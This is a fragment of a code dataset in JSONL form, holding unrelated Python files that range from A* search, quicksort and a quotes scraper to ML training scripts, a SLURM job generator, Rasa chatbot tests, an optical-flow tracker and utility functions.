Manhattan Distance since it's 2D grid and only moves in 4 directions; No diagnoal movement\ndef heuristic(explore_i, explore_j, target_i, target_j):\n x_distance = abs(explore_i - target_i)\n y_distance = abs(explore_j - target_j)\n return x_distance + y_distance\n\ndef a_star(grid, start_i, start_j, end_i, end_j):\n grid_copy = [row[:] for row in grid]\n #list that has 3 type of data in it; distance, path and swag\n distances_paths_and_swags = []\n #initialize grid setting all the cells with infinite distance\n for i in range(len(grid)):\n row = []\n for j in range(len(grid[0])):\n row.append([inf, [ \"(\" + str(i) + \",\" + str(j) + \")\"], [\"\"]])\n distances_paths_and_swags.append(row)\n # set the start cell's distance to zero\n distances_paths_and_swags[start_i][start_j][0] = 0\n # set the vertices_to_explore list with the start cell\n vertices_to_explore = [(0, start_i, start_j)]\n count = 0;\n # iterate til vertices_to_explore has a vertice to explore and didn't reach the end cell yet\n while vertices_to_explore and distances_paths_and_swags[end_i][end_j][0] == inf:\n current_distance, current_i, current_j = heappop(vertices_to_explore)\n grid_copy[current_i][current_j] = \"visited\"\n for direction in directions:\n explore_i, explore_j = new_position_after_move(current_i, current_j, direction)\n\n new_distance = current_distance + 1 + heuristic(explore_i, explore_j, end_i, end_j)\n new_path = distances_paths_and_swags[current_i][current_j][1] + [ \"(\" + str(explore_i) + \",\" + str(explore_j) + \")\" ]\n #if explore_i < 0 or explore_j < 0 or explore_i >= len(grid) or explore_j >= len(grid[0]):\n if is_out_of_grid(grid, explore_i, explore_j):\n continue\n elif is_this_cell_available(grid, grid_copy, explore_i, explore_j) \\\n and new_distance < distances_paths_and_swags[explore_i][explore_j][0]:\n item_in_next_cell = \"\"\n if (grid[explore_i][explore_j] != \"empty\"):\n item_in_next_cell = grid[explore_i][explore_j][0]\n new_swag = distances_paths_and_swags[current_i][current_j][2]\n if item_in_next_cell != \"\":\n new_swag += [\"\" + item_in_next_cell + \"\"]\n if len(new_swag) > 1 and new_swag[0] == \"\":\n new_swag = new_swag[1:]\n\n distances_paths_and_swags[explore_i][explore_j][0] = new_distance\n distances_paths_and_swags[explore_i][explore_j][1] = new_path\n distances_paths_and_swags[explore_i][explore_j][2] = new_swag\n heappush(vertices_to_explore, (new_distance, explore_i, explore_j))\n count += 1\n return distances_paths_and_swags, count\n\n\ndef quicksort( list, start, end):\n # base condition for this recursive function\n if start >= end:\n return\n # select random element to be pivot\n pivot_idx = randrange(start, end + 1)\n pivot_element = list[pivot_idx]\n #print(\"privot element: {0}\".format(pivot_element))\n # swap random element with last element in sub-listay\n list[end], list[pivot_idx] = list[pivot_idx], list[end]\n # tracks all elements which should be to left (lesser than) pivot\n less_than_pointer = start\n for i in range(start, end):\n if list[i] < pivot_element:\n # swap element to the right-most portion of lesser elements\n list[i], list[less_than_pointer] = list[less_than_pointer], list[i]\n # increase lesser element\n less_than_pointer += 1\n # move pivot element to the right-most portion of lesser elements\n list[end], list[less_than_pointer] = list[less_than_pointer], list[end]\n # Call quicksort on the \"left\" and \"right\" sub-lists\n quicksort(list, start, less_than_pointer - 1)\n quicksort(list, less_than_pointer + 1, end)\n","sub_path":"codeacademy/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"302777677","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\n\nurl = \"http://quotes.toscrape.com/page/\"\npage_no = 1\nwith open(\"quote_data.csv\",\"w\") as file:\n csv_writer = csv.writer(file)\n csv_writer.writerow([\"QUOTE\",\"AUTHOR\",'author_link'])\n while(True):\n response = requests.get(url+str(page_no))\n print(\"Scrapping data from:\",url+str(page_no),\"........\")\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n quotes = soup.find_all(class_=\"quote\")\n for quote in quotes:\n q_text = quote.find(class_ = \"text\").get_text() # quote text \n author,author_link = quote.find(class_ = \"author\").get_text(),quote.find('a')['href']\n csv_writer.writerow([q_text,author,\"http://quotes.toscrape.com\"+author_link])\n if(soup.find(class_ = 'next')==None):\n break\n page_no += 1\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"web scrapping/webscrapping project/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"133357063","text":"from sklearn.neural_network import MLPClassifier\nfrom sklearn import model_selection\nfrom sklearn.model_selection import train_test_split\n\n\ndef kfold(x, y, max_iters):\n best_accuracy = 0\n best_hidden_layer_size = 0\n\n for hidden_layer_size in range(20, 100, 10):\n print('Running mlp kfold: ', hidden_layer_size, ' / ', 100, end='\\r')\n mlp = MLPClassifier(random_state=1, max_iter=max_iters, hidden_layer_sizes=hidden_layer_size)\n kfold = model_selection.KFold(n_splits=10)\n accuracy = model_selection.cross_val_score(mlp, x, y, cv=kfold)\n if best_accuracy < accuracy.mean():\n best_accuracy = accuracy.mean()\n best_hidden_layer_size = hidden_layer_size\n\n return best_accuracy, best_hidden_layer_size\n\n\ndef train(x_train, y_train, max_iters, hidden_layer_size):\n\n mlp = MLPClassifier(random_state=1,\n max_iter=max_iters,\n hidden_layer_sizes=hidden_layer_size\n )\n # train mlp object using x_train and y_train\n mlp.fit(x_train, y_train)\n return mlp\n\n\ndef predict(x_test, knn):\n # predict using x_val\n y_pred_knn = knn.predict(x_test)\n return y_pred_knn","sub_path":"ml_algorithms/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"63155785","text":"# Train model and make predictions\nimport numpy\nimport pandas\nfrom keras.models import Sequential, model_from_json\nfrom keras.layers import Dense\nfrom keras.utils import np_utils\nfrom sklearn import datasets\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n\n# load dataset\niris = datasets.load_iris()\nX, Y, labels = iris.data, iris.target, iris.target_names\nX = preprocessing.scale(X)\n\n# encode class values as integers\nencoder = LabelEncoder()\nencoder.fit(Y)\nencoded_Y = encoder.transform(Y)\n\n# convert integers to dummy variables (i.e. one hot encoded)\ny = np_utils.to_categorical(encoded_Y)\n\ndef build_model():\n # create model\n model = Sequential()\n model.add(Dense(4, input_dim=4, init='normal', activation='relu'))\n model.add(Dense(3, init='normal', activation='sigmoid'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\ndef save_model(model):\n # saving model\n json_model = model.to_json()\n open('model_architecture.json', 'w').write(json_model)\n # saving weights\n model.save_weights('model_weights.h5', overwrite=True)\n\ndef load_model():\n # loading model\n model = model_from_json(open('model_architecture.json').read())\n model.load_weights('model_weights.h5')\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n return model\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.3, random_state=seed)\n\n# build\nmodel = build_model()\nmodel.fit(X_train, Y_train, nb_epoch=200, batch_size=5, verbose=0)\n\n# save\nsave_model(model)\n\n# load\nmodel = load_model()\n\n# predictions\npredictions = model.predict_classes(X_test, verbose=0)\nprint(predictions)\n# reverse encoding\nfor pred in predictions:\n print(labels[pred])","sub_path":"Iris_Example_Model.py","file_name":"Iris_Example_Model.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"134981307","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom random import sample\n\n\ndef question77RandomEven(start, end):\n if (\n (not isinstance(start, int))\n or\n (not isinstance(end, int))\n ):\n raise ValueError('Ecxception: Function only accepts integer value')\n return sample([x for x in range(start, end)\n if x % 2 != 0\n ], 5)\n\n\nprint(question77RandomEven(100, 201))\n","sub_path":"answers/q77.py","file_name":"q77.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482432835","text":"##################################################\n# trans_matrix_eqtl_wrapper.py\n#\n# $proj/Scripts/eqtls/trans/gtex/consortium/trans_matrix_eqtl_wrapper.py\n# \n# This version is the most up-to-date version for trans- pipeline.\n#\n# Author: Brian Jo\n#\n##################################################\n\nimport glob\nfrom sys import argv\nimport os.path\nimport os\nimport math\n\nproj_dir = os.environ['proj']\n\n# Examples\n# argv = [str(i) for i in range(9)]\n# argv[1] = '/Data/Expression/gtex/hg19/GTEx_phs000424_v6p/normalized/'\n# argv[2] = '_nonverlapping_certain_autosomes_normalized.txt'\n# argv[3] = '/Output/trans-mapping/gtex/MatrixEQTL/all-by-all-PEER-increments/'\n# argv[4] = '/Output/joblogs/trans-mapping/gtex/MatrixEQTL/all-by-all-PEER-increments/'\n# argv[5] = 'trans_matrix_eqtl_PEER_increments.R'\n# argv[6] = '2.5e8'\n# argv[7] = '20'\n# argv[8] = '40'\n\nin_path = proj_dir + argv[1]\nin_suffix = argv[2]\nout_dir = proj_dir + argv[3]\njoblog_dir = proj_dir + argv[4]\nRscript = argv[5]\ncis_dist = argv[6]\n# Split up each chromosome into how many parts?\nnum_split = argv[7]\n# How many scripts to run in a job?\nscripts_per_run = argv[8]\n\n# Make the job log directories\nif not os.path.exists(joblog_dir):\n os.makedirs(joblog_dir)\n\nmaster_script = proj_dir + '/Scripts/eqtls/trans/gtex/batch/matrix_eqtl_wrapper_' + Rscript + '.sh'\nmaster_handle = open(master_script, 'w')\nmaster_handle.write(\"#!/bin/bash\\n\\n\")\n\nmatrices = glob.glob(in_path + '*' + in_suffix)\nprint(len(matrices))\n\nnum_jobs = math.ceil(22 * int(num_split) / int(scripts_per_run))\n\nfor i, matrix in enumerate(matrices):\n filename = matrix.split('/')[-1]\n tissue_name = str.split(filename, in_suffix)[0]\n out_tissue_dir = out_dir + tissue_name + '/'\n if not os.path.exists(out_tissue_dir):\n os.makedirs(out_tissue_dir)\n out_file = out_tissue_dir + filename.replace('.txt','_MatrixEQTL')\n # Iterate through 22*int(num_split) parts - we will have num_jobs jobs that process int(scripts_per_run) parts each. User can further customize this construction.\n for k in range(num_jobs):\n sbatchfile = proj_dir + '/Scripts/eqtls/trans/gtex/batch/matrix_eqtl' + Rscript + '_' + tissue_name + '_part' + str(k+1) + '.slurm'\n job_outfile = 'trans_matrix_eqtl' + Rscript + '_' + tissue_name + '_part' + str(k+1)\n sbatchhandle=open(sbatchfile, 'w')\n cmd=r\"\"\"#!/bin/bash\n#SBATCH -J meqtl_%s_%s # job name\n#SBATCH --mem=24000 # 24 GB requested\n#SBATCH -t 24:00:00 # 24-hour short jobs\n#SBATCH -e %s # err output directory\n#SBATCH -o %s # out output directory\n\numask 002\n\"\"\"%(tissue_name, str(k+1), joblog_dir+job_outfile+'.err', joblog_dir+job_outfile+'.out')\n sbatchhandle.write(cmd)\n for n in range(int(scripts_per_run)):\n j = k*int(scripts_per_run) + n + 1\n cmd_r = r\"\"\"/usr/bin/Rscript %s/Scripts/eqtls/trans/gtex/consortium/%s \\\n%s %s %s %s %s %s %s\n\"\"\"%(proj_dir, Rscript, matrix, str(j), cis_dist, tissue_name, in_path + 'covariates/', out_file, num_split)\n sbatchhandle.write(cmd_r)\n if j == 22 * int(num_split):\n break\n sbatchhandle.close()\n master_handle.write(\"sbatch \" + sbatchfile + \" \\n\")\n\nmaster_handle.close()\n\nprint('sh %s'%(master_script))\n","sub_path":"code_examples/beehive/Scripts/eqtls/trans/gtex/consortium/trans_matrix_eqtl_wrapper.py","file_name":"trans_matrix_eqtl_wrapper.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340407638","text":"# Lint as: python2, python3\n\"\"\"Comparisons for //ads/metrics/lib/meterstick.\"\"\"\n\nfrom __future__ import division\n\nfrom meterstick import pdutils\nimport numpy as np\n\n\nclass Comparison(object):\n \"\"\"Base class for comparisons.\n\n Attributes:\n condition_column: A string denoting the dataframe column to\n compare against (e.g. \"Experiment\").\n baseline_key: A string denoting the value of the\n condition_column which represents the baseline comparison\n condition (e.g., \"Control\").\n factors: A numpy array for the values of condition_column coded as integers\n alternate_keys: The values of factors that are not the baseline\n baseline_index: The integer for the baseline_key in factors\n alternate_indices: The unique values of condition_column ordered by factors\n \"\"\"\n\n # These attributes are public because they have to be accessed by\n # standard error methods.\n\n def __init__(self, condition_column, baseline_key, name,\n include_base=False, sort=True):\n \"\"\"Initializes the Comparison object.\n\n Args:\n condition_column: A string denoting the dataframe column to\n compare against (e.g. \"Experiment\").\n baseline_key: A string denoting the value of the\n condition_column which represents the baseline comparison\n condition (e.g., \"Control\").\n name: A string denoting the column name for results of the\n comparison.\n include_base: A boolean for whether the base value should be included in\n the list of indices to compare.\n sort: A boolean for whether the conditions should be sorted.\n \"\"\"\n self.condition_column = condition_column\n self.baseline_key = baseline_key\n self.name = name\n self._include_base = include_base\n self.sort = sort\n\n def compute(self, data_condition, data_baseline, metric):\n \"\"\"Computes the change in metric across condition and baseline.\n\n Every comparison method must implement this method.\n\n Args:\n data_condition: A Pandas DataFrame containing the data for the\n treatment condition.\n data_baseline: A Pandas DataFrame with the data for the\n baseline condition.\n metric: The metric to be compared.\n\n Returns:\n A Pandas Series with the results of the comparison.\n\n Raises:\n NotImplementedError\n \"\"\"\n raise NotImplementedError()\n\n def precalculate(self, data):\n \"\"\"Initializes the factor variable.\n\n Args:\n data: A pandas dataframe.\n\n Raises:\n ValueError: The baseline key isn't found.\n \"\"\"\n conditions = data[self.condition_column].unique()\n if self.sort:\n conditions.sort()\n\n if (conditions != self.baseline_key).all():\n raise ValueError(\"Baseline value {} not present in column {}\".format(\n self.baseline_key, self.condition_column))\n\n self.conditions = [cond for cond in conditions\n if cond != self.baseline_key or self._include_base]\n\n def __call__(self, data, metric):\n \"\"\"Calculates the comparison for the metric on dataframe data.\n\n Args:\n data: A pandas dataframe. It is assumed that the condition column\n and slices are the index of the dataframe, with the condition\n column as the first level. The indexing is handled in core.py.\n metric: A Metric object.\n\n Returns:\n A pandas series with the comparisons of baseline against every other\n unique condition.\n \"\"\"\n results = []\n\n # get dataframe for the baseline\n baseline = pdutils.select_by_label(data, self.baseline_key)\n\n # get dataframe for each of the conditions\n for cond in self.conditions:\n condition = pdutils.select_by_label(data, cond)\n results.append(self.compute(condition, baseline, metric))\n\n if results:\n output = pdutils.concat(results, keys=self.conditions,\n name=self.condition_column)\n else:\n # return dataframe of NaNs with the appropriate number of rows\n output = pdutils.concat(\n [np.nan * self.compute(data, data, metric)] * len(self.conditions),\n keys=self.conditions,\n name=self.condition_column)\n output.name = self.name\n return output\n\n\ndef _make_simple_comparison(fn, name):\n \"\"\"Creates a class for comparison which is a function of the metric values.\n\n Args:\n fn: A function of the metric values.\n name: A string for the column names of the results.\n\n Returns:\n A subclass of Comparison which implements the passed in comparison function.\n \"\"\"\n\n class SimpleComparison(Comparison):\n \"\"\"A comparison which can be represented as a difference between two groups.\n \"\"\"\n\n def __init__(self, condition_column, baseline_key, include_base=False):\n \"\"\"Initializes the comparison.\n\n Args:\n condition_column: A string denoting the dataframe column to\n compare against (e.g. \"Experiment\").\n baseline_key: A string denoting the value of the\n condition_column which represents the baseline comparison\n condition (e.g., \"Control\").\n include_base: A boolean for whether the base value should be included in\n the list of indices to compare.\n \"\"\"\n super(SimpleComparison, self).__init__(condition_column, baseline_key,\n name, include_base)\n\n def compute(self, data_condition, data_baseline, metric):\n \"\"\"Calculates the comparison across condition and baseline.\n\n Args:\n data_condition: A pandas dataframe containing a comparison\n condition.\n data_baseline: A pandas dataframe containing the data for the\n baseline condition.\n metric: A Metric object.\n\n Returns:\n A Pandas series with the results of the comparison.\n \"\"\"\n return fn(metric(data_condition), metric(data_baseline))\n\n return SimpleComparison\n\n\ndef _absolute_difference(x, y):\n return x - y\n\n\nAbsoluteDifference = _make_simple_comparison(_absolute_difference,\n \"Absolute Difference\")\n\n\ndef _percentage_difference(x, y):\n return 100 * (x - y) / y\n\n\nPercentageDifference = _make_simple_comparison(_percentage_difference,\n \"Percentage Difference\")\n\n\nclass MH(Comparison):\n \"\"\"Class for Mantel-Haenszel estimator for comparing ratio metrics.\"\"\"\n\n def __init__(self, condition_column, baseline_key, index_var,\n include_base=False):\n \"\"\"Initializes the MH comparison.\n\n Args:\n condition_column: A string denoting the column in the DataFrame that\n contains the conditions (e.g. \"Experiment\").\n baseline_key: A string denoting the name of the condition that\n represents the baseline (e.g., \"Control\"). All conditions will be\n compared to this baseline condition.\n index_var: A string denoting the column in the DataFrame that contains\n the intermediate level of aggregation (e.g. \"AdGroup\").\n include_base: A boolean for whether the baseline condition should be\n included in the output.\n \"\"\"\n super(MH, self).__init__(condition_column, baseline_key,\n \"MH Ratio Percentage Difference\", include_base)\n self.index_var = index_var\n\n def compute(self, data_condition, data_baseline, metric):\n \"\"\"Calculates the MH comparison across condition and baseline.\n\n To get the MH ratio, we have to hack the dataframes. First, metric has to be\n defined by Ratio() so it has numerator and denominator properties. Then we\n calculate MH values and assign it to the numerator column, and set the\n denominator column to constant 1.\n The slices with invalid MH weights are dropped automatically.\n\n Args:\n data_condition: A pandas dataframe containing a comparison condition.\n data_baseline: A pandas dataframe containing the baseline condition.\n metric: A Metric object.\n\n Returns:\n A Pandas series with the results of the comparison.\n\n Raises:\n AttributeError: If metric doesn't have numerator or denominator property.\n RuntimeError: If numerator or denominator column not found in data.\n \"\"\"\n try:\n numer = metric.numerator\n denom = metric.denominator\n except AttributeError:\n raise AttributeError(\n \"Numerator or/and denominator not found for metric %s. \"\n \"For MH calculation, pls use Ratio() to define the metric.\" %\n metric.name)\n\n # This assumes split_vars has been set to the data_frame, which is the case\n # if you use Meterstick in the way specified in go/meterstick.\n split_vars = data_condition.index.names\n if split_vars[0] is None:\n grpby_vars = self.index_var\n else:\n grpby_vars = split_vars + [self.index_var]\n data_condition_agg = data_condition.groupby(grpby_vars).sum()\n data_baseline_agg = data_baseline.groupby(grpby_vars).sum()\n data_condition_agg_joined = data_condition_agg.join(\n data_baseline_agg, how=\"inner\",\n rsuffix=\"_other\").reset_index(self.index_var)\n data_baseline_agg_joined = data_baseline_agg.join(\n data_condition_agg, how=\"inner\",\n rsuffix=\"_other\").reset_index(self.index_var)\n denom_other = denom + \"_other\"\n mh_weights = (data_condition_agg_joined[denom] +\n data_condition_agg_joined[denom_other])\n data_condition_agg_joined[numer] *= (data_condition_agg_joined[denom_other]\n / mh_weights)\n data_baseline_agg_joined[numer] *= (data_baseline_agg_joined[denom_other]\n / mh_weights)\n data_condition_agg_joined[denom] = 1\n data_baseline_agg_joined[denom] = 1\n mh_ratio = metric(data_condition_agg_joined) / metric(\n data_baseline_agg_joined)\n return (mh_ratio - 1) * 100\n","sub_path":"comparisons.py","file_name":"comparisons.py","file_ext":"py","file_size_in_byte":9782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491008127","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport os\nimport subprocess\n\nimport psutil\n\n\ndef make_abs(path, base_dir=None):\n base_dir = base_dir or os.getcwd()\n if not os.path.isabs(path):\n return os.path.join(base_dir, path)\n\n return path\n\n\ndef contains_files(d):\n \"\"\"Check if a directory contains any normal files\"\"\"\n for _, _, files in os.walk(d):\n if files:\n return True\n return False\n\n\ndef used_memory():\n return psutil.Process(os.getpid()).memory_info().rss\n\n\ndef available_memory():\n return psutil.virtual_memory().available\n\n\ndef disk_usage(path, human=False):\n \"\"\"disk usage in bytes or human readable format (e.g. '2,1GB')\"\"\"\n command = ['du', '-s', path]\n if human:\n command.insert(-1, '-h')\n\n return subprocess.check_output(command).split()[0].decode('utf-8')\n\n\ndef walk(document, transform):\n if not isinstance(document, dict):\n return document\n\n new_doc = dict()\n for key, value in document.items():\n if isinstance(value, dict):\n value = walk(value, transform)\n elif isinstance(value, list):\n value = [walk(v, transform) for v in value]\n\n new_key, new_value = transform(key, value)\n new_doc[new_key] = new_value\n\n return new_doc\n\n\ndef remove_dots(document):\n return walk(document, lambda key, value: (key.replace('.', '-'), value))\n\n\ndef restore_dots(document):\n return walk(document, lambda key, value: (key.replace('-', '.'), value))\n\n\ndef logging_setup(verbosity=1, logfile=None, logger_name=None):\n logger = logging.getLogger(logger_name)\n log_level = (3 - verbosity) * 10\n fmt = '%(asctime)s - %(process)d - %(levelname)s - %(module)s - %(message)s'\n formatter = logging.Formatter(fmt)\n logger.setLevel(log_level)\n logger.propagate = False\n\n if logfile:\n file_handler = logging.FileHandler(logfile)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n else:\n console_handler = logging.StreamHandler()\n console_handler.setLevel(log_level)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n","sub_path":"mit_d3m/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"384503733","text":"import pytest\nfrom rasa_sdk.events import (\n ActionExecuted,\n BotUttered,\n FollowupAction,\n UserUtteranceReverted,\n UserUttered,\n)\n\nfrom covidflow.actions.action_fallback import ActionDefaultFallback\nfrom covidflow.constants import ACTION_LISTEN_NAME, FALLBACK_INTENT\n\nfrom .action_test_helper import ActionTestCase\n\nUSER_TEXT = \"It's home from work we go\"\n\n\ndef latest_events(template_name):\n return [\n BotUttered(\n text=\"Heigh ho, heigh ho\", metadata={\"template_name\": template_name}\n ),\n ActionExecuted(ACTION_LISTEN_NAME),\n UserUttered(USER_TEXT),\n ]\n\n\nclass ActionDefaultFallbackTest(ActionTestCase):\n def setUp(self):\n super().setUp()\n self.action = ActionDefaultFallback()\n\n @pytest.mark.asyncio\n async def test_in_form(self):\n tracker = self.create_tracker(\n active_loop=True, events=latest_events(\"utter_dwarfs_song\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_already_fallback_intent(self):\n tracker = self.create_tracker(\n intent=FALLBACK_INTENT, events=latest_events(\"utter_dwarfs_song\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_already_message_with_variation(self):\n tracker = self.create_tracker(\n intent=FALLBACK_INTENT,\n events=latest_events(\"utter_dwarfs_song__some_variation\"),\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_already_error_message(self):\n tracker = self.create_tracker(\n intent=FALLBACK_INTENT, events=latest_events(\"utter_dwarfs_song_error\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [UserUtteranceReverted(), FollowupAction(ACTION_LISTEN_NAME)]\n )\n\n self.assert_templates([\"utter_dwarfs_song_error\"])\n\n @pytest.mark.asyncio\n async def test_other_intent(self):\n tracker = self.create_tracker(\n intent=\"unrelated\", events=latest_events(\"utter_dwarfs_song\")\n )\n\n await self.run_action(tracker)\n\n self.assert_events(\n [\n UserUtteranceReverted(),\n ActionExecuted(ACTION_LISTEN_NAME),\n UserUttered(\n USER_TEXT,\n parse_data={\n \"text\": USER_TEXT,\n \"intent\": {\"name\": FALLBACK_INTENT, \"confidence\": 1.0},\n \"intent_ranking\": [\n {\"name\": FALLBACK_INTENT, \"confidence\": 1.0}\n ],\n \"entities\": [],\n },\n ),\n ]\n )\n\n self.assert_templates([])\n","sub_path":"action-server/tests/actions/test_action_fallback.py","file_name":"test_action_fallback.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264361398","text":"'''\nGiven an array and an element, print all indices of an element in an array.\n\nsample input:\n\narr = [1,2,3,4,6,3,4,3]\n\nsample output:\n\nAll indices of element 3 are : 2,5,7\n\nhttps://www.youtube.com/watch?v=bQkwHBaNioE&list=PL-Jc9J83PIiFxaBahjslhBD1LiJAV7nKs&index=24\n\n'''\n\ndef allIndices(arr, idx, fsf, element):\n \n if(idx == len(arr)):\n # return array of length as many times element is present\n return [0] * fsf\n \n if(arr[idx] == element):\n # if element found increment fsf variable and do recursive call\n lst = allIndices(arr, idx+1, fsf+1, element)\n lst[fsf] = idx\n return lst\n else:\n # if element not equal to current element make recursive call without incrementing fsf variable\n lst = allIndices(arr, idx+1, fsf, element)\n return lst\n \nprint(allIndices([1,2,3,4,6,3,4,3], 0, 0, 3))\n \n ","sub_path":"pepcoding/recursion/7_print_all_indices_of_element_in_array_difficult.py","file_name":"7_print_all_indices_of_element_in_array_difficult.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"217170808","text":"import numpy as np\nimport cv2\nimport os\nimport math\n\nclass lkcomponentshsv():\n points = dict()\n video = None\n n_frames = 0\n feature_params = dict( maxCorners = 100,\n qualityLevel = 0.01,\n minDistance = 10,\n blockSize = 3 )\n\n lk_params = dict( winSize = (31,31),\n maxLevel = 5,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\n def __init__(self,video,config):\n self.video = video\n self.feature_params[\"maxCorners\"] = config['lkcomponents']['feature_params_maxCorners']\n self.feature_params[\"qualityLevel\"] = config['lkcomponents']['feature_params_qualityLevel']\n self.feature_params[\"minDistance\"] = config['lkcomponents']['feature_params_minDistance']\n self.feature_params[\"blockSize\"] = config['lkcomponents']['feature_params_blockSize']\n self.lk_params[\"winSize\"] = tuple(config['lkcomponents'][\"lk_params_winSize\"])\n self.lk_params[\"maxLevel\"] = config['lkcomponents'][\"lk_params_maxLevel\"]\n self.lk_params[\"criteria\"] = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT,config['lkflow'][\"lk_params_criteria_EPS\"],config['lkflow'][\"lk_params_criteria_COUNT\"])\n self.lossthreshold = config['lkcomponents']['lossthreshold'] \n\n def start(self):\n self.tracks = []\n self.track_len = 10\n self.detect = 5\n self.n_frames = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))\n self.width = int(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))\n self.height = int(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n\n ret,first_frame = self.video.read()\n r = cv2.selectROI(first_frame)\n (x,y,dx,dy) = r \n self.box = r\n\n # many templates\n self.p0list = []\n hsv = cv2.cvtColor(first_frame,cv2.COLOR_BGR2HSV)\n self.template_saturation = hsv[:,:,1]\n region = self.template_saturation[y:y+dy,x:x+dx]\n points = cv2.goodFeaturesToTrack(region, **self.feature_params)\n points = np.float32(points + [x,y])\n \n self.p0list = points\n self.p0size = len(self.p0list)\n self.p0flags = np.ones(len(self.p0list))\n self.p0lastgoodI = np.zeros(len(self.p0list))\n\n\n def step(self,step):\n ret, frame = self.video.read()\n if(ret):\n hsv = cv2.cvtColor(frame,cv2.COLOR_RGB2HSV)\n saturation = hsv[:,:,1]\n vis = frame.copy()\n if(len(self.p0list) != 0):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n p1, st1, err = cv2.calcOpticalFlowPyrLK(self.template_saturation, saturation, self.p0list, None, **self.lk_params)\n p0r,st2,error = cv2.calcOpticalFlowPyrLK(saturation,self.template_saturation,p1,None,**self.lk_params)\n d = abs(self.p0list-p0r).reshape(-1,2).max(-1)\n #print(d)\n # Select good points\n bound = st1 == 1\n good = d < 1\n\n \n #prev_average = np.sum(good_prev_corners,axis=0)\n #new_average = np.sum(good_new_corners,axis=0)\n #diff_avg = new_average-prev_average\n\n # compute average of good points\n idx = np.where(good)\n good_prev_points = self.p0list[idx]\n good_new_points = p1[idx]\n prev_average = np.sum(good_prev_points,axis=0)\n new_average = np.sum(good_new_points,axis=0)\n diff_avg = new_average-prev_average\n \n data = []\n for i,(new,good,flag) in enumerate(zip(p1,good,self.p0flags)):\n x,y = new.ravel()\n x = int(x)\n y = int(y)\n if(good and flag):\n # update p0list\n self.p0list[i] = p1[i]\n\n # display good points\n self.mask = cv2.circle(frame,(x,y),5,(255,0,0))\n dx = (int)(self.lk_params[\"winSize\"][0]/2)\n dy = (int)(self.lk_params[\"winSize\"][1]/2)\n rect = cv2.rectangle(frame,(int(x)-dx,int(y)-dy),(int(x)+dx,int(y)+dy),(255,0,0))\n data.append((x,y))\n if(x >= 0 and x< self.width and y >= 0 and y < self.height ):\n self.p0lastgoodI[i] = gray[y,x]\n else: \n # update with the unabscured points\n self.p0list[i] = self.p0list[i] + diff_avg\n self.p0flags[i] = 0\n \n if(x >= 0 and x< self.width and y >= 0 and y < self.height):\n I = gray[y,x] \n if(self.p0lastgoodI[i]==I):\n self.p0flags[i]=1\n\n if(np.sum(self.p0flags)/len(self.p0flags) target:\n root = root.left\n else:\n root = root.right\n \n tmp2 = self.closestValue(root, target)\n \n if not root:\n return tmp1\n \n if abs(tmp1-target) < abs(tmp2-target):\n return tmp1\n else:\n return tmp2","sub_path":"Codes/270 Closest Binary Search Tree Value Easy.py","file_name":"270 Closest Binary Search Tree Value Easy.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"151505271","text":"import json\nimport 